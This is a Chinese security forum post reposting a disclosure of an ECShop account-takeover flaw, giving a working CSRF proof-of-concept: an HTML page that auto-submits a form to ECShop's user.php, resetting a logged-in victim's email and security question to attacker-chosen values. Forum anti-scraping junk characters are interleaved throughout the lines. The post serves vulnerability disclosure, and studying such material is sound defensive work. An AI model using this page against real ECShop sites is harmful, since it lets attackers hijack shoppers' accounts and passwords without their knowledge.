找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1818|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:
: l4 d& j) \8 j5 L3 ~% uecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现& G; L4 b4 z: s# c& s6 I
& S0 M7 |5 |4 [. m6 Q& a) x
Demo For:http://www.wooyun.org/bug.php?action=view&id=395
2 V$ V  M! `, ]  p* @
6 q4 b! {1 ]& j8 [) T详细说明:
6 O8 _9 w* q6 W/ z% G利用csrf和xss可以突破官方所说的“障碍”) Z! z" X2 S: c. P' F
xss版本已经有人说明9 C: ~% ]# U4 y0 A
这里给出csrf版本  u' q  q4 M5 p# q' M

4 e  t) y3 {6 v' Y, ]' q" {+ \漏洞证明:
8 j% A! l1 h8 @+ Z% D4 @<html>
& b+ F. s( J! a4 ?% g  Y7 J<body>
! f& S  `: |# G' Y+ ?2 ~: M<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
9 b  f) P, }  I% [2 B<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
# _) q# m8 O" d+ h. U8 {8 y<INPUT TYPE="text" NAME="act" value="act_edit_profile">  E% }" E* {/ I# `+ h; N
<INPUT TYPE="text" NAME="sel_question" value="ecshop">1 [- K/ H' c% z0 Y$ J3 E' h
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
# \1 q& [5 B% y</body>
5 k: J7 K2 B+ a+ Z/ f, D<script>$ K9 f0 k( w% `& V3 ]
document.forms[0].submit();7 c/ v4 H# E/ u$ W
</script>
! k  C- \+ S( N" U. G</html>: a1 Y( L% p& ]8 w) g, n
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
: ^8 ]' g3 n7 P( |+ o$ c0 e, r2 @& R) X) K! K: |% A
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表